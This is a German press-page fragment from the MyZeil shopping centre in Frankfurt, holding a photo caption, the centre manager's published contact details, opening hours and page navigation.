Foto 3
Von unten nach oben v.l.n.r.
Oliver Schwebel, Marcus Schwartz
Markus Hartmann, Dirk Barkhausen
Copyrighthinweis:
MyZeil Frankfurt

Kontakt:

Marcus  Schwartz
Center Manager MyZeil

Telefon: 069/2972397-0
Mobil: 0175 – 62 62 039
E-Mail: centermanagement-mzf@ece.com

www.myzeil.com} else {

Top
1 2 3 5 Seite 1 von 5

Fragen? Wir helfen Ihnen gerne! 069 - 29723970

Sie erreichen uns Mo-Mi von 10-20 Uhr und Do-Sa von 10-21 Uhr